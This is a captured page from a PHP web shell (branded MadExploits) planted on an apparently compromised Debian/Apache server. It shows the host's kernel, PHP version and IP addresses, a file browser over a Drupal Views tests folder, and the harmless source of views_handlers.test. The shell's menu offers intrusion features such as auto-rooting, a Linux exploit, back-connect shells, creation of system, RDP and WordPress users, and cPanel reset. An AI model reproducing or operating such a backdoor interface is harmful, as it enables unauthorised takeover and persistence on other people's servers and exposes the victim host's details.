Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.145.53.196
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
tests /
handlers /
[ HOME SHELL ]
Name
Size
Permission
Action
views_handler_area_text.test
1.75
KB
-rw-r--r--
views_handler_argument_null.te...
2.05
KB
-rw-r--r--
views_handler_argument_string....
3.46
KB
-rw-r--r--
views_handler_field.test
15.29
KB
-rw-r--r--
views_handler_field_boolean.te...
4.22
KB
-rw-r--r--
views_handler_field_counter.te...
1.94
KB
-rw-r--r--
views_handler_field_custom.tes...
1.12
KB
-rw-r--r--
views_handler_field_date.test
3.65
KB
-rw-r--r--
views_handler_field_file_exten...
2.04
KB
-rw-r--r--
views_handler_field_file_size....
1.89
KB
-rw-r--r--
views_handler_field_math.test
1.04
KB
-rw-r--r--
views_handler_field_url.test
1.43
KB
-rw-r--r--
views_handler_field_xss.test
1.27
KB
-rw-r--r--
views_handler_filter_combine.t...
2.3
KB
-rw-r--r--
views_handler_filter_date.test
8.21
KB
-rw-r--r--
views_handler_filter_equality....
4.16
KB
-rw-r--r--
views_handler_filter_in_operat...
4.69
KB
-rw-r--r--
views_handler_filter_numeric.t...
9.88
KB
-rw-r--r--
views_handler_filter_string.te...
21.97
KB
-rw-r--r--
views_handler_sort.test
3.27
KB
-rw-r--r--
views_handler_sort_date.test
5.84
KB
-rw-r--r--
views_handler_sort_random.test
2.56
KB
-rw-r--r--
views_handlers.test
1.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views_handlers.test
<?php /** * @file * Contains ViewsHandlerTest. */ /** * Tests generic handler functionality. * * @see view */ class ViewsHandlerTest extends ViewsSqlTest { public static function getInfo() { return array( 'name' => 'Handlers', 'description' => 'Tests generic handler functionality.', 'group' => 'Views Handlers', ); } /** * {@inheritdoc} */ protected function viewsData() { $views_data = parent::viewsData(); $views_data['views']['test_access'] = array( 'title' => 'test access', 'help' => '', 'area' => array( 'handler' => 'views_test_area_access', ), ); return $views_data; } /** * Tests access for handlers using an area handler. */ public function testHandlerAccess() { $view = $this->getBasicView(); // add a test area $view->display['default']->handler->override_option('header', array( 'test_access' => array( 'id' => 'test_access', 'table' => 'views', 'field' => 'test_access', 'custom_access' => FALSE, ), )); $view->init_display(); $view->init_handlers(); $handlers = $view->display_handler->get_handlers('header'); $this->assertEqual(0, count($handlers)); $view->destroy(); $view = $this->getBasicView(); // add a test area $view->display['default']->handler->override_option('header', array( 'test_access' => array( 'id' => 'test_access', 'table' => 'views', 'field' => 'test_access', 'custom_access' => TRUE, ), )); $view->init_display(); $view->init_handlers(); $handlers = $view->display_handler->get_handlers('header'); $this->assertEqual(1, count($handlers)); $this->assertTrue(isset($handlers['test_access'])); } }
Close